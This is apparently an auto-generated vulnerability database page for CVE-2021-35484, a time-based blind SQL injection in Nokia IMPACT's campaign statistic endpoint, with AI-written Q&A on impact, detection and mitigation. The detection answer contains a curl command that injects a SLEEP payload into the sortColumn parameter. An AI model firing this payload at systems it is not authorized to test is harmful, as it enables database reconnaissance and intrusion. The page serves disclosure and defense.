CVE-2021-35484
Time-Based Blind SQL Injection in Nokia IMPACT Campaign Endpoint
Publication date: 2026-03-03
Last updated on: 2026-03-05
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| nokia | impact | to 19.11.2.10-20210118042150283 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2021-35484 is a vulnerability in Nokia IMPACT version 19.11.2.10-20210118042150283 that allows an authenticated user to perform a Time-based Boolean Blind SQL Injection attack.
This attack targets the endpoint /ui/rest-proxy/campaign/statistic via the sortColumn HTTP GET parameter.
Exploiting this vulnerability enables an attacker to extract sensitive data from the database, including the database user, database name, and database version information.
How can this vulnerability impact me? :
This vulnerability can impact you by allowing an authenticated attacker to access sensitive database information.
Such unauthorized access could lead to further exploitation of the database, potentially compromising confidential data and the integrity of the system.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'The vulnerability CVE-2021-35484 is a Time-based Boolean Blind SQL Injection in Nokia IMPACT via the sortColumn HTTP GET parameter on the /ui/rest-proxy/campaign/statistic endpoint. Detection typically involves sending crafted HTTP GET requests to this endpoint with specially designed sortColumn parameters to observe time delays indicating SQL injection.'}, {'type': 'paragraph', 'content': 'Specific detection commands or scripts are not provided in the available resources. However, a common approach is to use tools like curl or Burp Suite to send requests with payloads that cause time delays if the injection is successful, for example by appending SQL time delay functions in the sortColumn parameter.'}, {'type': 'list_item', 'content': 'Example curl command to test for time-based SQL injection (conceptual):'}, {'type': 'list_item', 'content': 'curl -u <username>:<password> "http://<target>/ui/rest-proxy/campaign/statistic?sortColumn=1\' AND IF(SLEEP(5),1,0)-- "'}, {'type': 'paragraph', 'content': 'If the response time is significantly delayed, it may indicate the presence of the vulnerability.'}] [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps for CVE-2021-35484 include restricting access to the affected endpoint /ui/rest-proxy/campaign/statistic to trusted and authenticated users only, as the vulnerability requires authentication.
Additionally, applying any available patches or updates from Nokia for the IMPACT platform version 19.11.2.10-20210118042150283 is critical to fix the SQL injection flaw.
If patches are not immediately available, consider implementing Web Application Firewall (WAF) rules to detect and block suspicious SQL injection payloads targeting the sortColumn parameter.
Monitoring and logging access to the vulnerable endpoint can also help in early detection of exploitation attempts.